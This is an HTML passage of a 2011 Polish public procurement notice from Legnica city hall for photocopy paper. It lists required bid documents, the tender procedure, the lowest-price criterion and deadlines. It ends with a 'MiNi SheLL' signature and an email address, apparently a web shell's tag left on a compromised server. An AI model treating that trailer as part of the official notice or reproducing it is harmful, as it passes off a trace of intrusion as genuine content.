III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz oferty wg załączonego druku  Rozdziału  Nr 1 specyfikacji istotnych warunków zamówienia.
2.   Oświadczenie, że Wykonawca spełnia warunki udziału w postępowaniu z art. 22 ust.1 ustawy Pzp wg załącznika nr 1 do Instrukcji dla Wykonawców- Rozdział Nr 2 specyfikacji istotnych warunków zamówienia.
3. Oświadczenie Wykonawcy - wskazanie części zamówienia, której wykonanie powierzy podwykonawcom - wg załącznika nr 4 do Instrukcji dla Wykonawców- Rozdział Nr 2 specyfikacji istotnych warunków zamówienia.
4. Oświadczenie Wykonawcy na przyjęcie warunków zmian w umowie - wg załącznika nr 5 do Instrukcji dla Wykonawców- Rozdział Nr 2 specyfikacji istotnych warunków zamówienia.
5. Wypełnioną umowę  wg Rozdziału Nr  3 specyfikacji istotnych warunków zamówienia -  wypełnienie  i  akceptacja   umowy  nie  stanowi zobowiązań   prawnych ze strony Zamawiającego.
6. Oświadczenie Wykonawcy, że zdobył wszelkie informacje, które mogą być konieczne do przygotowania  oferty oraz podpisania umowy - wg Formularza  oferty - Rozdział Nr 1 specyfikacji istotnych warunków zamówienia.
7. Oświadczenie, iż Wykonawca zapoznał się z zamówieniem i przyjmuje jego warunki bez zastrzeżeń -   wg Formularza  oferty - Rozdział Nr 1 specyfikacji istotnych warunków zamówienia.
8. W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia pełnomocnictwo, w którym Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ustanowią i wskażą Zamawiającemu pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowanie w postępowaniu i zawarcie umowy w sprawie zamówienia publicznego. Pełnomocnictwo będzie podpisane przez osoby upoważnione do reprezentowania i podpisywania oświadczeń w imieniu Wykonawców zgodnie z dokumentami rejestracyjnymi. W przypadku niezgodności wpisu ze stanem faktycznym Wykonawcy każdy Wykonawca musi złożyć dokumenty sporządzone przez jego właściwy organ, a uprawniający daną osobę lub osoby 
do reprezentowania Wykonawcy i podpisywania oświadczeń w imieniu Wykonawców.
9. W sytuacji gdy Wykonawca, zgodnie z art. 26  ust 2b w zakresie warunków określonych w pkt. 13 Instrukcji dla Wykonawców- Rozdział Nr 2 specyfikacji istotnych warunków zamówienia, polegał będzie na wiedzy i doświadczeniu oraz  osobach zdolnych  wykonania zamówienia innych podmiotów, niezależnie od charakteru  prawnego łączących go z nim stosunków, pisemne zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji  niezbędnych zasobów na okres korzystania  z nich przy wykonaniu zamówienia.
11. Formularz cenowy  - wg załącznika nr 6 do Instrukcji dla Wykonawców- Rozdział Nr 2 specyfikacji istotnych warunków zamówienia.
12.  Specyfikacja techniczna wydana przez producenta zawierająca nazwę handlową i parametry techniczno - jakościowe proponowanego w ofercie papieru kserograficznego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z zapisami załącznika WARUNKI ZMIAN W UMOWIE - załącznik nr 5 do Instrukcji dla Wykonawców- Rozdział 2 siwz.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.legnica.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Legnica, Plac Słowiański 7 , pokój nr 22- Referat zamówień  publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.02.2011 godzina 13:00, miejsce: Urząd Miasta Legnica, Plac Słowiański 8 , pokój nr 208..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com